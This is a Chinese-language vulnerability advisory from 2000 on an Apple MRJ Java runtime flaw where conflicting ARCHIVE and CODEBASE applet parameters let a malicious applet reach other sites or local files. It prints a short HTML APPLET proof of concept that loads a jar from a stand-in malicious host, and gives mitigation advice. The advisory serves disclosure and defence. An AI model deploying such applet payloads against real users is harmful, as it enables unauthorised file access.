首页 -> 安全研究

安全研究

安全漏洞
Apple Macintosh MRJ 未授权文件访问漏洞

发布日期:2000-12-20
更新日期:2000-12-20

受影响系统:

  o Mac OS + MRJ 2.2.3 + Internet Explorer 4.5
  o Mac OS + MRJ 2.2.3 + Internet Explorer 5
  o Mac OS + MRJ 2.2.3 + Netscape 6
  o Mac OS + MRJ 2.2.3 + iCab pre2.2
  o Mac OS + MRJ 2.2.3 + Mozilla MRJ Plug-in 1.0b1 + Netscape 4.76
描述:

Mac OS的Java实时系统(MRJ) 的某些版本存在一个安全问题。这个Java执行系
统是较新的MacOS版本中自带的一个标准组件。另外,所有使用MRJ的第三方
Macintoshweb浏览器包括IE 4.5/5,Netscape 6, iCab等等均受此问题影响。
  
当ARCHIVE和CODEBASE参数冲突时,MRJ没有对Java运行环境进行正确的安全控
制。这可能允许一个恶意Java applet被下载并访问用户本地的文件系统或者
未授权Web站点。

ARCHIVE参数在HTML中被用来指定装入JAVA applet的信息。作为一个安全措施,
MRJ限制applet能访问的资源,它只能访问在ARCHIVE或CODEBASE参数中指定的
服务器。然而,如果这两个参数都被设置,这个安全措施就失效了,applet可
以访问任意地点的文件。

下面的例子中,"test.jar"将被从http://www.malicious.com/下载,并可以
访问http://www.victim.com.

<APPLET CODE="Test"
CODEBASE="http://www.victim.com/"
ARCHIVE="http://www.malicious.com/test.jar">

如果指定CODEBASE="http:///",applet将可以访问用户本地主机的文件。这可能
导致本地文件泄漏问题。

<*来源:Hiromitsu Takagi (takagi@ETL.GO.JP)
        http://java-house.etl.go.jp/ml/archive/j-h-b/039457.html
*>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


Hiromitsu Takagi提供了一个测试页面:

http://java-house.etl.go.jp/~takagi/java/security/mrj-codebase1/Test.html


建议:

临时解决方法:

NSFOCUS建议您在没有获取补丁之前,暂时关闭浏览器中的Java功能。

厂商补丁:

暂无


浏览次数:5484
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障